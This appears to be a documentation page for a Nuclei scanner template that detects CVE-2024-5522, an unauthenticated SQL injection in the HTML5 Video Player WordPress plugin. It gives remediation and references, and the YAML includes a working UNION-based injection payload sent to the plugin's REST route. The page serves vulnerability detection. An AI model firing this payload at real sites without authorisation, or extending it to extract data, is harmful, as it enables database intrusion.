Skip to content
Nuclei Templates

WordPress HTML5 Video Player < 2.5.27 - SQL Injection

ID: CVE-2024-5522

Severity: critical

Author: JohnDoeAnonITA

Tags: wpscan,cve,cve2024,wordpress,wp-plugin,wp,sqli,html5-video-player

Description

Section titled “Description”

The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks

YAML Source

Section titled “YAML Source”
id: CVE-2024-5522


info:
  name: WordPress HTML5 Video Player < 2.5.27 - SQL Injection
  author: JohnDoeAnonITA
  severity: critical
  description: |
    The HTML5 Video Player WordPress plugin before 2.5.27 does not sanitize and escape a parameter from a REST route before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks
  remediation: Fixed in 2.5.27
  reference:
    - https://wpscan.com/vulnerability/bc76ef95-a2a9-4185-8ed9-1059097a506a/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-5522
  classification:
    cvss-score: 9.8
    cwe-id: CWE-89
    cve-id: CVE-2024-5522
    epss-score: 0.04
    epss-percentile: 9
    cpe: cpe:2.3:a:bplugins:html5_video_player:*:*:*:*:wordpress:*:*:*
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/html5-video-player"
    product: html5_video_player
    vendor: bplugins
  tags: wpscan,cve,cve2024,wordpress,wp-plugin,wp,sqli,html5-video-player


variables:
  num: "999999999"


http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/h5vp/v1/video/0?id='+union all select concat(0x64617461626173653a,1,0x7c76657273696f6e3a,2,0x7c757365723a,md5({{num}})),2,3,4,5,6,7,8-- -"


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '{{md5(num)}}'


      - type: status
        status:
          - 200
# digest: 490a0046304402203bb5193fd1d54bb1edabf5064a4bfa0cbe49768f118c9c3d004f344c4156e82002205d1522f529a47bae6a347083f56f6841cc8a56f90d3f001b0b88ec4d5d6b6f14:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-5522.yaml"

View on Github